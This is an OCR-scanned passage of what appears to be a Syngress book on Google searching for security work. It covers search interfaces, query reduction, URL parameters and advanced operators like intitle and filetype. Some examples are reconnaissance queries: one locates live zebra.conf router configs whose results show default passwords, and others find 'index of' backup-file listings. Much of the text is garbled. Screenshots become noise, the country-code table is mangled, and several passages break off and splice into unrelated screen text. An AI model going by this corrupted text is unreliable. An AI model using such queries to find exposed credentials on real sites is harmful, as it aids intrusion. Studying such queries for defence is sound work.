Translation Proxies It's possible to use Google as a transparent proxy server via the transla- tion service. When you click a Translate this page link, you are taken to a translated copy of that page hosted on Google's servers. This serves as a sort of proxy server, fetching the page on your behalf. If the page you want to view requires no translation, you can still use the translation ser- vice as a proxy server by modifying the hi variable in the URL to match the native language of the page. Bear in mind that images are not proxied in this manner. We will cover Translation Proxies further in Chapter 3. Google Groups Due to the surge in popularity of Web-based discussion forums, blogs, mailing Hsts, and instant-messaging technologies, USENET newsgroups, the oldest of public discussion forums, have become an overlooked form of online public dis- cussion. Thousands of users still post to USENET on a daily basis. A thorough discussion about what USENET encompasses can be found at www.faqs.org/ faqs/usenet/what-is/partl/. DejaNews (deja.com) was once considered the www. syngress.com Google Searching Basics • Chapter 1 7 authoritative collection point for aU past and present newsgroup messages until Google acquired deja.com in February 2001 (see www.google.com/press/ pressrel/pressrelease48. html). This acquisition gave users the ability to search the entire archive of USENET messages posted since 1995 via the simple, straight- forward Google search interface. Google refers to USENET groups as Google Groups. Today, Internet users around the globe turn to Google Groups for general discussion and problem solving. It is very common for IT practitioners to turn to Google's Groups section for answers to aU sorts of technology-related issues. The old USENET community stiU thrives and flourishes behind the sleek interface of the Google Groups search engine. The Google Groups search can be accessed by cUcking the Groups tab of the main Google Web page or by surfing to http://groups.google.com.The search interface (shown in Figure 1.4) looks a bit difierent from other Google search pages, yet the search capabilities operate in much the same way. The major difference between the Web search page and the Groups search page Ues in the newsgroup browsing links. Figure 1.4 The Google Groups Search Page E) (3 Google Croups ^^^^^^^^^^^^^^^^^^^ ^ - ] I C I [G]littp://group;. google. com/ " '^Qr Google Go oale GroupsC3 Wab Images Groups News Frooole mors > ' ■ C^gggle Search ) p^^^^^^^ Omups HbIc Post and read comments In Usenet discussron forums. aU. Any conceivable topic. news. Info about Usenet News... biz. BlsIhsss products, services, reviews. _. rec. Games, hobble .s, sports... comp. Hardware, software, consumer irfo._. sci. Applied scienc e. social science... humanities. Fine art. literature. Dhiiosochv... SPC. Social Issues, culture... misc. Employment, health, and much more... lalk. Curmrt issus and debate... Browse comoiete list of grouos... Advertising Programs - Business Solutions - About Google Entering a search term into the entry field and clicking the Search button whisks you away to the Groups search results page (summarized in Table 1.2), which varies quite a bit from the other Google results pages. www. syngress.com Chapter 1 • Google Searching Basics Table 1.2 Google Groups Search Links Interface Section Description Advanced Groups Search Groups Help alt., biz., comp., etc. links This link takes you to the Advanced Groups Search page, which allows for more precise searches. Not all advanced features are listed on this page. We will look at these advanced options in the next chapter. This link takes you to the Google Groups Frequently Asked Question page. These links reflect the topical hierarchy of USENET itself. By clicking on the links, you can browse through Google groups to read mes- sages in a 'threaded' format. Google Image Search The Google Image search feature allows you to search (at the time of this writing) over 880 million graphic files that match your search criteria. Google will attempt to locate your search terms in the image filename, in the image cap- tion, in the text surrounding the image, and in other undisclosed locations, to return a "de-duplicated" list of images that match your search criteria. The Google Image search operates identically to the Web search, with the exception of a few of the advanced search terms, which we will discuss in the next chapter. The search results page is also slightly different, as you can see in Figure 1.5. Figure 1.5 The Google Images Search Results Page f3 O O Google Search: matrix ssh nmap \ < \ I C ] [G|littp://image5. google. com/image5?q=matrix+55h+nnfiflpahl=en* " Q- matrix 55h nmap GooQie images^ Wab Images Grou ps News Frooole more > matrijf ssJn nmap SafeSearch is off Images Results 1 - 3 of 3 for matrix ssh nmap. (0.07 seconds) Show_ All bIzsb - Large - Medium - Small Tip: Try Google Answers for help from expert researchers Matrix-nmap-SSH- Sploitjpg 2400xia00 pixels -16m localhast.niy._./ Matrix-nmap-SSH- Sploit-ipg .th u m b _Ma trix-n m a p -S S H - S p . , 100 X 75 pixels - 2k iratrixNmap.png 249 X 132 pixels -32k storm s h oc k . c om/f rank/ blDgL^may20DS_html www. syngress.com Google Searching Basics • Chapter 1 9 The page header is nearly identical to the Web search results page, as is the results line. The Show: line is unique to image results. This Une allows you to select images of various sizes to show in the results. The default is to display images of all sizes. Each matching image is shown in a thumbnail view with the original resolution and size followed by the URL of the image. Google Preferences You can access the Preferences page by cUcking the Preferences link from any Google search page or by browsing to www.google.com/preferences.These options primarily pertain to language and locality settings, as shown in Figure 1.6. Figure 1.6 The Google Preferences Screen Preferences Jhttp://www.goo9le,com/preference5?hl=en © ~'Qr Coo-Js GOiJglC Preferences Preferertces Help | About Google Save your preferences when finished and return to search. ( Save ['references ) Global Preferences (changes apply to all Google services} Interface Language Display Google tips and messages In: ' English 1 1 j If you do not find your native language in the pulldown above, you can I beip Google create It througfi our Google In Your Landuage program . Search Language 8 Search for pages written In any language i Recom mended i. C Search only for pages written In these language(s}: :3__H] The Interface Language option describes the language that Google will use when printing tips and informational messages. In addition, this setting controls the language of text printed on Google's navigation items, such as buttons and links. Google assumes that the language you select here is your native language and will "speak" to you in this language whenever possible. Setting this option is not the same as using the translation features of Google (discussed in the fol- lowing section) . Web pages written in French will still appear in French, regard- less of what you select here. To get an idea of how Google's Web pages would be altered by a change in the interface language, take a look at Figure 1.7 to see Google's main page rendered in www. syngress.com 10 Chapter 1 • Google Searching Basics "hacker speak." In addition to changing this setting on the preferences screen, you can access all the language-specific Google interfaces directly from the Language Tools screen at www.google.coni/language_tools. Figure 1.7 The Main Google Page Rendered in "Hacl '^ovitname^name^^/ovitname^ ^^ovitivaiue type="stnn9">192.2.34.2[ 0 [ S j j «/ovit:data> «ovit:data ... devresource.hp.Gom/fonims/thrBad. jspa?threadiD=1992S!tstart=0&forumlD=1S -47k - Cached - Similar pages doc/cfgmaker ... by Interface Description -ifref^name by Interface Type -ifdesc^nr interface ■description uses interface Number (defauit)-ifdesc=ip w\™.tuvalu.t^ymrtgi''cfgmaker.htmi - 19k - Cached - Similar pages ITworid.com - LINUX DESICrOP APPLICATIONS ^ Freshen Your Adds with LINUX DESKTOP APPLICATIONS Archive Giade stores the user interface's description you create in an XML file. At njntime, you call ... www.itworid.com/nl/lnj: desktop/093D2ClCny -37k - Cached - Similar paa&s ITworid.com - LINUX DESKTOP APPLICATIONS - Freshen Your Apps with > ... Additionally, Glade works with many programming languages and supports XML. Glade stores the user interface's description you create in an XML file. ... www.itworid.com/nl/lnx deskLop'[>E}3[>2TO1/pf index.html - 19k - Cached - Simiiar paoes I •Display a menij www. syngress.com Google Searching Basics • Chapter 1 23 First, notice that none of the result summaries look anything like our zebra. conf file. Google effectively ignored our punctuation marks and spacing, despite the fact that we enclosed them in double quotes. Google has instead keyed on the words Interface's and description. In addition, Google's auto stemming feature located the word interface in our fourth returned result. Sometimes auto stemming just plain gets in the way. Underground Googling Bad Form on Purpose In some cases, there's nothing wrong with using poor Google syntax in a search. If Google safely ignores part of a human-friendly query, leave it alone. The human readers will thank you! I recommend leaving the syntax as is for clarity, but adding another reduction element to our search, zebra, conf, mahing our next query: ! Interface's description. zebra . conf This narrows our search and returns results that look much more like the conf file we're looking for, as shown in Figure 1.16. Figure 1.16 Search Reduction in Action Caogle Search: "! Interface'^ description. " zebra.conf C 1 lQ|hitp://mvw.c|oo9le.corn/search?num=100(&hl=en&lr=fi;ie=U " Or Google Web Images Groups News Froogle more » Interface's descriptian. * zebra.conf Wsb Results 1 - 30 of about 54 for "! Interface's description . " zebra . conf . (0.62 seconds) Did you mean: '1 tnterface description. " zebra.conf zgzwi-wiki - EJem Zebra Conf 06 ... Id: zebra.conf.sample^v 1.14 19991^02^19 17:26:39 developer Exp S ! hostname SioSI password — enable password — Interface's description. ! ... WiMw.zaragozawlreless.org/ z9zwiywk/index.phpyEjem2et>raConfO& - I2k - Cached - Similar paofs zebra ! 1 zebra sample configuration file 1 1 Sid: zebra.conf. ... Id: zebra.conf.sample,v 1.14 1999^02719 17.26.3& developer Exp $ ! hostname Router password zebra enable password zebra ! ! Interface's description. ! ... jaime.robles.nu/wirelessyzebrayzebra.conf - Ik - Caci':&a - Similar papes ... Id: zebra.conf.sample,v 1.14 19991^02719 17:2S:3S developer Exp $. ! htretname Rooter, password zebra, enable password zebra. \ \ Interface's description. > ... WAW.s-me.co.jp'lpnuts/lpnuts4r3y htmlyiPnuts40 VPNychlSsO&.html - 9k - Cached - Similar pages ■ Dtsplay a niEru www.syngress.com 24 Chapter 1 • Google Searching Basics It's tempting in this situation to simply add: - " zebra . conf . sample " to our query to get rid of any search that shows sample zebra. conf files. However, it helps to step into the shoes of the software's users for just a moment. Software installations like this one often ship with a sample configuration file to help guide the process of setting up a custom configuration. Most users wiU simply edit this file, changing only the settings that need to be changed for their environments, saving the file not as a .sample file but as a .conf file. In this situation, the user could have a live configuration file with the term zebra. conf.sample stiU in place. Reduction based on this term may remove live configuration files created in this manner. There's another reduction angle. Notice that our zebra. conf.sample file con- tained the term hostname Router. This, is most likely one of the settings that a user will change, although we're making an assumption that his machine is not named Router. This is less a gamble than reducing based on zebra. conf.sample, however. Adding the reduction term —"hostname Router" to our query brings our results number down and reduces our hits on potential sample files, all without sacri- ficing potential live hits. Although it's certainly possible to keep reducing, often it's enough to make just a few minor reductions that can be validated by eye than to spend too much time coming up with the perfect search reduction. Our final (that's four qualifiers for just one word!) query becomes: "! Interface's description. " zebra. conf -"hostname Router" This is not the best query for locating these files, however. Advanced opera- tors, discussed in the next chapter, will get us even closer to that perfect query! Working With Google URLs Advanced Google users begin testing advanced queries right from the Web inter- face's search field, refining queries until they are just right. Every Google query can be represented with a URL that points to the results page. Google's results pages are not static pages. They are dynamic and are created "on the fly" when you click the Search button or activate a URL that links to a results page. Submitting a search through the Web interface takes you to a results page that can be represented by a single URL. For example, consider the query ihackstuff. www. syngress.com Google Searching Basics • Chapter 1 25 Once you enter this query, you are whisked away to the following URL, or something similar: www. google . com/search?q=i]iackstuf f If you bookmark this URL and return to it later or simply enter the URL into your browser's address bar, Google wiU reprocess your search for ihackstuff and display the results. This URL then becomes not only an active connection to a Hst of results, it also serves as a nice, compact sort of shorthand for a Google query. Any experienced Google searcher can take a look at this URL and realize the search subject. This URL can also be modified fairly easily. By changing the word ihackstuff to iwritestuff, the Google query is changed to find the term iwritestuff. This simple example illustrates the usefulness of the Google URL for advanced searching. A quick modification of the URL can make changes happen fast! Underground Googling Uncomplicating URL Construction The only URL parameter that is required in most cases is a query (the q parameter), mal /"^ ysfc . V 1 / -> Imag-ss Groups N&ws FroMlo more x J vapflJ^lt food r^ear^h) pf;^::^"^^"^'*' Web Results 1 - lOOoT about 2&D, WD for food [definitloi|- (0.24 seconds) News results far food -Vi&wtodaVs tea stories j?Si> Swaziland: Lono-Term Imnact of Food Crisis -AilAfrica.com - 52 '^^i/ miriLites ago COLDIRETTI NO BIOTECH FOOD ON ITALIANS' TABLES - Aaerzia Giornalistica Halia - 4 iTours a-go NEW GUIDELINES COULD TOPPLE FOOD PYRAMID - Miami Herald (sut>Ecrlption) - 11 nours ago Food safety Food safety. Tine food safety programme ensures tfiat. ... Food and fieaith in Europe: a new tiasls for action A putilication for healtti professionals ... www.euro wiio.int'food safety - 11K - Caciiec S pen sored Linier _ WW/, pnceqrabber.com a Welcome to Food Tecliroiogy. New t>ooi^ on Muiti-way Arai^sis. A new publication ... See animations ... Magnetic Resonance in Food Science. An Aww. models. kvl.dKy - ZOU - Aug 17. 2004 - Caciiea ■ OisDlav A menu Our URL has changed to include the restrict value (select countries shown in Table 1.7), but more important, notice that the returned Web pages are not all from DK. The first hit, for example, from www.euro.who.int, is thought by Google to be physically located in Denmark. www.syngress.conn Chapter 1 • Google Searching Basics Underground Googling How Google Owns the Continents You can easily test Google's assumption that a site is within a certain geo- graphic region with a quick host and whois command: whOOp:~# host www.euro.who.int www.euro.who.int has address 194.234.173. whOOp:~# whois 194.234.173.80 % This is the RIPE Whois server. % The objects are in RPSL format. % Rights restricted by copyright. % See http://www.ripe.net/ripencc/pub-services/db/copyright.html inetnum: 194.234.173.0 - 194.234.173.255 netname: DK-SUPERTEL descr: SUPERTEL DANMARK ApS descr: Telephone Operator country: DK Table 1 .7 restrict Code Values (see full table in Appendix C) restrict country code Country countryAF Afghanistan countryAR Argentina countryAU Australia countryBE Belgium countryBM Bermuda Continued www. syngress.com Google Searching Basics • Chapter 1 35 Table 1 .7 restrict Code Values (see full table in Appendix C) restrict country code Country rniintrvRR K,\J U 1 1 LI y LJI\ Brazil rniintrvRS \,\J U 1 1 LI y Rahama<; LJ Q 1 1 CI 1 1 1 CI J rou ntrvCA Canada countrvCH Switzerland rountrvCN \A I 1 LI y 1 V China countrvCO Colombia V.^ 1 \J III 1 \A countrvCR VaV/ \A 1 1 L 1 y 1 \ Costa Rica mil ntrvCl I L>i 1 1 LI y ^ w Cu ba rou ntrvCZ ^V^u 1 1 LI y ^ ' Czech Renublic countrvDE v«V/ \A 1 1 L 1 y ^ Germany \,« 1 1 1 1 ka I I y rountrvDO \A I 1 LI y l_/ \J IIIIIII^UII l\\^ l>y \A K/ 1 1 V. rou ntrvEG \A I 1 LI y ^ Eclvnt countrvES VaV/ \A 1 1 L 1 y ^ ui 1 \ Greece countrvGU v« V.^ \A 1 1 L 1 y \^ Guam rni J ntrvH K \_ w u 1 1 LI y 1 1 IX Honn Konn 1 1 \J 1 1 U 1 1 1 u rni J ntrvHT \_ W \A 1 1 LI y 1 II Haiti countrylE Ireland countrvIL VaV/ \A 1 1 L 1 y 1 ^ Israel country! N V- \-/ \A IILI yiiv India countrvIO Iraq e~r\\ 1 n+r\/l D (-UU 1 1 LI y 1 r\ Iran ficlarvii/" Rcimih\li/~ ^^Tl lidll ^Ibldlllll- r\c:|JUUII(- Uly countrylS Iceland countrylT Italy countryJM Jamaica countryJP Japan countryKE Kenya countryKP Korea, Democratic People' Continued WWW. syngress.com 36 Chapter 1 • Google Searching Basics Table 1 .7 restrict Code Values (see full table in Appendix C) restrict country code Country countryKR Korea, Republic of countryKW Kuwait countryKY Cayman Islands countryLK Sri Lanka countryMX Mexico countryNL Netherlands countryNO Norway countrvNZ New Zealand countryPA Panama countryPE Peru rniintrvPH V- w u 1 1 L 1 y 1 II Philir)r)inp<; 1 llllllu/lu/lll^3 countryPK Pakistan countryPL Poland countryPR Puerto Rico countryPT Portugal countryRO Romania countryRU Russian Federation countrySA Saudi Arabia countrySE Sweden countryUA Ukraine countryUG Uganda countryUM United States Minor Outlying Islands countrvUS United States countryUY Uruguay rni 1 ntrvl 17 ^L^U 1 1 LI y \J ^ countryVA Holy See (Vatican City State) countryVG Virgin Islands (British) countryVI Virgin Islands (U.S.) countryVN Vietnam countryZA South Africa countryZR Zaire www. syngress.com Google Searching Basics • Chapter 1 Summary Google is deceptively simple in appearance but offers many powerful options that provide the groundwork for powerful searches. Many different types of content can be searched, including Web pages, message groups such as USENET, images, and more. Beginners to Google searching are encouraged to use the Google-pro- vided forms for searching, paying close attention to the messages and warnings Google provides about syntax. Boolean operators such as OR and NOT are avail- able through the use of the minus sign and the word OR (or the | symbol), respectively, whereas the AND operator is ignored, since Google automatically includes aU terms in a search. Advanced search options are available through the Advanced Search page, which allows users to narrow search results quickly. Advanced Google users narrow their searches through customized queries and a healthy dose of experience and good old common sense. Solutions Fast Track Exploring Google's Web-Based Interface 0 There are several distinct Google search areas (including Web, group, and image searches), each with distinct searching characteristics and results pages. 0 The Web search page, the heart and soul of Google, is simple, streamlined, and powerful, enabHng even the most advanced searches. 0 A Google Groups search allows you to search aU past and present newsgroup posts. 0 The Image search feature allows you to search for nearly a biUion graphics by keyword. 0 Google's preferences and language tools enable search customization, translation services, language-specific searches, and much more. Building Google Queries 0 Google query building is a process that includes determining a solid base search and expanding or reducing that search to achieve the desired results. Chapter 1 • Google Searching Basics 0 Always remember the "golden rules" of Google searching. These basic premises serve as the foundation for a successful search. 0 Used properly, Boolean operators and special characters help expand or reduce searches. They can also help clarify a search for fellow humans who might read your queries later on. Working With Google URLs 0 Once a Google query has been submitted, you are whisked away to the Google results page, the URL of which can be used to modify a search or recall it later. 0 Although there are many different variables that can be set in a Google search URL, the only one the is really required is the q, or query, variable. 0 Some advanced search options, such as as_qdr (date-restricted search by month), cannot be easily set anywhere besides the URL. Links to Sites ■ www.google.com This is the main Google Web page, the entry point for most searches. ■ http://groups.google.com The Google Groups Web page. ■ www.google.com/images Search Google for images and graphics. ■ www.google.com/language_tools Various language and translation options. ■ www.google.com/advanced_search The advanced search form. ■ www.google.com/preferences The Preferences page, which allows you to set options such as interface language, search language, SafeSearch filtering, and number of results per page. ■ www.google.com/intl/xx-hacker/ A hacker's search page. www. syngress.com Google Searching Basics • Chapter 1 Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Q: Some people like using nifty toolbars. Where can I find information about Google toolbars? Al Ask Google. Seriously, if you aren't already in the habit of simply asking Google when you have a Google -related question, you should get in that habit. Google can almost always provide an answer if you can figure out the query. Here's a list of some popular Google search tools: ■ Windows Google API Search Tool, www.searchenginelab.com/prod- ucts/ gapis/ ^^^^^ ■ Mac SearchGoogle. Service, http://gu.st/proj/SearchGoogle.service/ ■ Mozilla Googlebar, http://googlebar.mozdev.org/ ■ Internet Explorer ThejGadMie Toolba r, toolb ar.google.com/ ■ Dave's Quick Search Taskbar ToolJ http://notesbydave.com/toolbar/^ ■ Ultrabar www.ultrabar.com/ Q: Are there any techniques I can use to learn how to^j^d Google URL's? Al Yes. There are a fw ways. First, subnTLt basic queries through the web interface and look at the URL that's generated when you submit the search. From the search results page, modify the query sHghtly and look at how the URL changes when you submit it. This boils down to "do, then do again." The second way involves using "query builder" programs that present a graphical interface which allows you to select the search options you want, building a Google URL as you navigate through the interface. Keep an eye on the search engine hacking forums at http://johnny.ihackstuff.com, specifically the www. syngress.com 40 Chapter 1 • Google Searching Basics "coders corner" where users discuss programs that perform this type of functionaHty. Q: What's better? Using Google's interface, using toolbars, or writing URL's? Al It's not fair to claim that any one technique is better than the others. It boils down to personal preference, and many advanced Google users use each of these techniques in different ways. Many lengthy Google sessions begin as a simple query typed into the www.google.com web interface. Depending on the narrowing process, it may be easier to add or subtract from the query right in the search field. Other times, like in the case of the daterange oper- ator (covered in the next chapter), it may be easier to add a quick 'as_qdr' parameter to the end of the URL. Toolbars excel at providing you quick access to a Google search while you're browsing another page. Most toolbars allow you to select text on a page, right-click on the page and select 'Google search' to submit the selected text as a query to Google. Which technique you decide to use ultimately depends on your tastes and the context in which you perform searches. www. syngress.com Solutions in this Chapter: Operator Syntax Introducing Google's Advanced Operators orators Cogiliyiipg Colliding Operators and BadSearch-Fu Ur^ks to Sites ^P^^^ '0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 42 Chapter 2 • Advanced Operators Introduction Beyond the basic searching techniques explored in the previous chapter, Google offers special terms known as advanced operators to help you perform more advanced queries. These operators, when used properly, can help you get to exactly the information you're looking for without spending too much time poring over page after page of search results. When advanced operators are not provided in a query, Google will locate your search terms in any area of the Web page, including the title, the text, the URL, or the like. We take a look at the fol- lowing advanced operators in this chapter: ■ intitle, allintitle ■ inurl, allinurl ■ filetype ■ allintext ■ site ■ link ■ inanchor ■ daterange ■ cache ■ info ■ related ■ phonebook ■ rphonebook ■ bphonebook ■ author ■ group ■ msgid ■ insubject ■ stocks ■ define www. syngress.com Advanced Operators • Chapter 2 43 Operator Syntax An advanced operator is nothing more than a part of a query. You provide advanced operators to Google just as you would any other query. In contrast to the somewhat free-form style of standard Google queries, however, advanced operators have a fairly rigid syntax that must be followed. The basic syntax of a Google advanced operator is operator: searchjterm. When using advanced operators, keep in mind the following: ■ There is no space between the operator, the colon, and the search term. Violating this syntax can produce undesired results and wiU keep Google from understanding the advanced operator. In most cases, Google will treat a syntactically bad advanced operator as just another search term. For example, providing the advanced operator intitle without a following colon and search term wiU cause Google to return pages that contain the word intitle. ■ The search term is the same syntax as search terms we covered in the previous chapter. For example, you can provide as a search term a single word or a phrase surrounded by quotes. If you provide a phrase as the search term, make sure there are no spaces between the operator, the colon, and the first quote of the phrase. ■ Boolean operators and special characters (such as OR and +) can still be applied to advanced operator queries, but be sure not to place them in the way of the separating colon. ■ Advanced operators can be combined in a single query as long as you honor both the basic Google query syntax as well as the advanced oper- ator syntax. Some advanced operators combine better than others, and some simply cannot be combined. We wiU take a look at these limita- tions later in this chapter. ■ The ALL operators (the operators beginning with the word ALL) are oddballs. They are generally used once per query and cannot be mixed with other operators. Examples of valid queries that use advanced operators include these: ■ intitle: Google This query wiU return pages that have the word Google in their title. www. syngress.com 44 Chapter 2 • Advanced Operators ■ intitle: "index of" This query will return pages that have the phrase index of in their title. Remember from the previous chapter that this query could also be given as intitle '.index, of since the period serves as any character. This technique also makes it easy to supply a phrase without having to type the spaces and the quotation marks around the phrase. ■ intitle: "index of" private This query wiU return pages that have the phrase index of in their title and also have the word private anywhere in the page, including in the URL, the title, the text, and so on. Notice that intitle only applies to the phrase index of and not the word private, since the first unquoted space foUows the index of phrase. Google inter- prets that space as the end of your advanced operator search term and continues processing the rest of the query. ■ intitle: "index of" "backup files" This query wiU return pages that have the phrase index of in their title and the phrase backup files anywhere in the page, including the URL, the title, the text, and so on. Again, notice that intitle only applies to the phrase index of Troubleshooting Your Syntax Before we jump head first into the advanced operators, let's talk about trou- bleshooting the inevitable syntax errors you'U run into when using these opera- tors. Google is kind enough to teU you when you've made a mistake, as shown in Figure 2.L Figure 2.1 Google's Helpful Error Messages ^ f3 O Google Search: google ^^^^^B^^HH^^^^^^^^H ' ] 1 C 1 0hitp;//www.goo9le,com/search7q=googleS!as_q(ir=3m " CHr ^ Web Imaoes Groups News Frooole more » D The date restriction was dropped from your search because it is not supported fortiiis type of search. Web Results 1 - 10 of about 61,200,000 over the for google. (0.42 seconds) T f Co to 'http: //www.goiigte.com/a(fvartceOearcti?q=google&hl=en4lr=&ie=UTF-S&as_£nIr=3m" WWW. syngress.com Advanced Operators • Chapter 2 45 In this example, we tried to give Google an invalid option to the as_qdr vari- able in the URL. (The correct syntax would be as_qdr=m3, as we'U see in a moment.) Google's search result page listed right at the top that there was some sort of problem. These messages are often the key to unraveling errors in either your query string or your URL, so keep an eye on the top of the results page. We've found that it's easy to overlook this spot on the results page, since we nor- mally scroll past it to get down to the results. Sometimes, however, Google is less helpful, returning a blank results page with no error text, as shown in Figure 2.2. Figure 2.2 Google's Blank Error Message eee Google Search : filetypeipdf ^ ^ 1 C 1 |G]l^itP'//www.goo9le.com/search7q=filetype:pclf&ie=UTF-e& ~'Qr flletypeipdf ^ Google Web Imaoes G roups News Frooole more filetype:pdf | (_ Search _) p„f^„„^^^ Gooole Home - Advertisino Proarams - Business Solutions - About Goooie ©2004 Google A. Fortunately, this type of problem is easy to resolve once you understand what's going on. In this case, we didn't provide Google with a search query. We restricted our search to only PDF fdes (we'U look at filetype in more detail later in this chapter), but we failed to provide anything to search for. Subtracting results from zero results gets Google all confused, resulting in a blank page. www. syngress.com 46 Chapter 2 • Advanced Operators But That's What I Wanted! Sometimes you actually want to get results for a search query you know is going to cause problems, such as filetype:pdf. It seems reasonable that this query would return every PDF file that Google has crawled, but it simply doesn't. In cases like this, you just need to be a bit creative. To get a list of every PDF file, try a query like filetype:pdf pdf. This query asks Google to return every PDF file that contains the word pdf — but remember, Google automatically searches the URL for your search term, so every file ending in .PDF will have PDF in the URL Google's advanced operators are very versatile, but keep in mind the rules listed earlier. In addition, you should remember that not all operators can be used everywhere. Some operators can only be used in performing a Web search, and others can only be used in a Groups search. Refer to Table 2.3, which lists these distinctions. If you have trouble remembering these rules, keep an eye on the results line near the top of the page. If Google picks up on your bad syntax, an error message will be displayed, letting you know what you did wrong. Sometimes, however, Google will not pick up on your bad form and will try to perform the search anyway. If this happens, keep an eye on the search results page, specifically the words Google shows in bold within the search results. These are the words Google interpreted as your search terms. If you see the word intitle in bold, for example, you've probably made a mistake using the intitle operator. From a technical standpoint, the title of a page can be described as the text that is found within the TITLE tags of an HTML document. The title is displayed at the top of most browsers when viewing a page, as shown in Figure 2.3. In the context of Google groups, intitle will find the term in the title of the message post. Introducing Google's Advanced Operators Intitle and All intitle: Search Within the Title of a Page www. syngress.com Advanced Operators • Chapter 2 47 Figure 2.3 Web Page Title ^^^^^^^^^^^^B Syngress Publishing [ ^ ^ I [c]^ " syngress SYNGRESS SSii^ IT BOOKS AND CERTIFICATION SOFTWARE f " Hom& ^''^1viicro50ft"^''ciscc/Broc3de"\"^SectJrit>'"\^ ,NET '^^^ LEGO "\''''Meinljars\''^CertifigationV^ Catalog Menu Display J menii for "http://www.syngress.conn/marketing/secjrity" ^ As shown in Figure 2.3, the title of the Web page is "Syngress PubHshing." It is important to reaUze that some Web browsers will insert text into the title of a Web page, under certain circumstances. For example, consider the page shown in Figure 2.1, shown again in Figure 2.4, this time before the page is actually fin- ished loading. Figure 2.4 Browser Injected Title Elements <3 O f> Loading "Syngress Publishing" [ M - I [ X I O f'rtp://www.svngre5s.conn/ " Q" syngre SYNGRESS Welcome! _ Create an A "ty ChKckojt IT BOOKS AN D CERT IF ICATION S OF TWARE /"^ Home ^-^Micro50tt"\''cisccJBix;cadg"\'"'"Sgwrity"\'"'" .NET LEGO "^^Mgnnbai^-^CertifieatiQi-iV^ ( Catalog Menu ■ j ] r L,CI Inariina ~hnn://www.wnqres5.comy. rnmnlitpd It) nf 77 itfm ^ GoDgle i nti tl e : "i n d e X of" " backu p f i les" Search 3 Advancfld Search Web Results 1 - It) of about 556 for intitle:"i ndex of "backup files". (0.24 secorrds) Index of /tex-archive/supporl/lintex Index of /tex-archive/supporf lintex. Name Last modified Size Description ... Thie backup files usually created by many editors are also removed. ... www.tug.org^tex-archive/supportflintex/ - 6k - Cached - Similar pages Display a menu Notice that "backup files" is not in the title of the first found document. If we were to modify this query to allintitle: "index of" "backup files" we would get a dif- ferent response from Google, as shown in Figure 2.6. Figure 2.6: Allintitle Results Compared O O O Google Search: allintitle:"index oP "backup files" I ^ - 1 1 l any type of page with any kind of extension, but understand that Google might not have the capability to search an unknown file type. Table 2.1 listed th le mam fde types that Google searches, but you might be wondering which, of the over 8,000 file extensions, are the most prevalent on the Web. Table 2.2 lists the top 25 file extensions found on the Web, sorted by the number of hits for that file type. Table 2.2 Top 25 File Extensions, According to Google Extension Number of Hits (Approx.) HTML 18,100,000 HTM 16,700,000 PHP 16,600,000 ASP 15,700,000 CGI 11,600,000 PDF 10,900,000 CFM 9,880,000 SHTML 8,690,000 JSP 7,350,000 Continued www. syngress.com 56 Chapter 2 • Advanced Operators Table 2.2 Top 25 File Extensions, According to Google Extension Number of Hits (Approx.) ASPX 6,020,000 PL 5,890,000 PHP3 4,420,000 DLL 3,050,000 PHTML 2,770,000 FCGI 2,550,000 SWF 2,290,000 DOC 2,100,000 TXT 1,720,000 PHP4 1,460,000 EXE 1,410,000 M\/ 1 VI V 1 1 1 n nnn 1,11 u,uuu XLS 969,000 J HTML 968,000 SHTM 883,000 BML 859,000 Many of the file extensions shown in Table 2.2 might be familiar to you; others might not. Filext (www.filext.com) is a great resource for getting detailed information about file extensions, what they are, and what programs the exten- sions are associated with. Google converts every document it searches to either HTML or text for online viewing. You can see that Google has searched and converted a file by looking at the results page shown in Figure 2.11. www. syngress.com Advanced Operators • Chapter 2 57 Figure 2.11 Converted File Types on a Search Page f3 O 0 Google Search: filetvpeidoc doc i -~| I O I |G|http://www.google.com/search7hl=enair=4ie=UTF-8fi!q=filetyj " Google Web I m apes Groups News Frooole more » filetypeidoc doc J L Search ) p^faren.B^ Web Results 1 - 10 of about 2,120,000 for filetypeidoc doc. (0.9S seconds) rpgcn The Darknet and the Future of Content Distribution File Format. Microsoft Word 2000 - View as HTIVIL The Darknet and the Future of Content Distribution. Peter BIddle, Paul England, Marcus Peinado, and Bryan Wiliman. Microsoft Corporation 1. Abstract. ... crypto.stanford.eduyDRM2002/darknetS.doc - Simiiar pages Sponsoned Links Doc Huge selection, great deals on everything, -aff eBay.com Notice that the first result lists [DOC] before the title of the document and a file format of Microsoft Word 2000. This indicates that Google recognized the file as a Microsoft Word 2000 document. In addition, Google has provided a View as HTML link that when clicked will display an HTML approximation of the file, as shown in Figure 2.12. Figure 2.12 A Google-Converted Word Document O O O i The Darknet and the Future of Content Distrlbytion T~] fc] |G|h'tp;//216. 239, 41. 104/sear<:h7q=cache;L2H_mj5-5AJ:<:rypto, Stan -'Q,- Google © This Is the html version of the file h 1 1 p. .^^ c rv pto. s tanf ord . edu.' DRM 20021 d ark n et5. d oc . Go g I e automatically generates html versions of documents as we crawl the web. To link to orbookmari« this page, use the following uri: http://ww.googie.cora/Bearch? q=cache : L_Z H_iiij 6-BAJ s crypto . Btanf ord . edu/Dfi>12 002/ darknetB . doc + f iletype : dcc+docthl^an Gi^gif in nos a^iiialgd V/'ish xh? aumors oj skis pags mir respomibie J'or ixs comenl. These terms only appear in links pointing to this page: doc The Darknet and the Future of Content Distribution Peter Biddle, Paul England, Marcus Peinado, and Bryan Willnnan Microsoft Corporation 1 www.syngress.com 58 Chapter 2 • Advanced Operators When you click the link for a document that Google has converted, a header is displayed at the top of the page, indicating that you are viewing the HTML version of the page. A link to the original file is also provided. If you think this looks similar to the cached view of a page, you're right. This is the cached ver- sion of the original page, converted to HTML. Although these are great features, Google isn't perfect. Keep these things in mind: ■ Google doesn't always provide a link to the converted version of a page. ■ Google doesn't always properly recognize the file type of even the most common file formats. ■ When Google crawls a page that ends in a particular file extension but that file is blank, Google will sometimes provide a valid file type and a link to the converted page. Even the HTML version of a blank Word document is still, well, blank. This operator flakes out when ORed. As an example, the query filetYpe:xls xls returns 912,000 results. The query filetype :pdf pdf returns 10,900,000 results. The query (fiktypeipdj \ filetype:xls) returns 17,600,000 results, which is pretty close to the two individual search results combined. However, when you start adding to this precocious combination with things like (fdetypeipdj \ filetpye:xh) (pdf 